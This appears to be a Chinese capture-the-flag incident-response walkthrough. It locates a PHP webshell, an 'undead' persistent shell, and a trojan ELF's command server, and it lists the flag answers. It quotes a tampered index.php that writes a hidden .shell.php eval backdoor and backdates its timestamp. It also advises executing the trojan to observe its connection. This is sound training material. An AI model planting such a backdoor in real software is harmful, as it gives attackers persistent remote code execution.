题目:
1.web目录存在木马,请找到木马的密码提交
2.服务器疑似存在不死马,请找到不死马的密码提交
3.不死马是通过哪个文件生成的,请提交文件名
4.黑客留下了木马文件,请找出黑客的服务器ip提交
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
1.web目录存在木马,请找到木马的密码提交
方法一:命令查询
在/var/www/html路径下,输入命令
find ./ -name "*.php" |xargs grep "eval("
方法二:工具查询
把/var/www/html下载下来,放沙箱中跑一下:
或者用D盾跑一下:
查看一下内容:
flag1:flag{1}
2.服务器疑似存在不死马,请找到不死马的密码提交
方法一:命令查询
在/var/www/html路径下,输入命令:
find ./ -name "*.php" |xargs grep "eval("
然后MD5在线网站解码5d41402abc4b2a76b9719d911017c592
:
方法二:工具查询
题目1使用沙箱跑的结果(上面的D盾也OK啦):
挨着查看一下内容,确定是你啦!!
MD5解码和上面一样。
flag2:flag{hello}
3.不死马是通过哪个文件生成的,请提交文件名
方法一:命令查询
在/var/www/html路径下,输入命令
打开index.php,在后面发现了关键语句,确定目标!
方法二:工具查询
依旧是题目1使用沙箱跑的结果,沙箱解决一半问题!
查看index.php的内容,找亮点:
<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
$path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>
flag3:flag{index.php}
4.黑客留下了木马文件,请找出黑客的服务器ip提交
方法一:命令查询
在/var/www/html路径下,有一个shell(1).elf文件。在 Linux 下,一般木马后缀都为elf
,所以先锁定目标!
这里需要先赋权限,然后执行,让其产生外联行为。注意执行后会卡在这里,再开一个终端窗口进行后续操作即可。
在新的窗口中输入命令:
netstat -alntup
方法二:工具查询
把shell(1).elf文件单独拿出来沙箱跑一下(这里换在线沙箱跑了,之前用的那个分析不出来),一眼确定!
flag4:flag{10.11.55.21}
5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
根据题目4就得到题目5的flag咯~
flag5:flag{3333}
参考链接:
https://blog.csdn.net/m0_63138919/article/details/138822190
https://blog.csdn.net/qq_63928796/article/details/140502608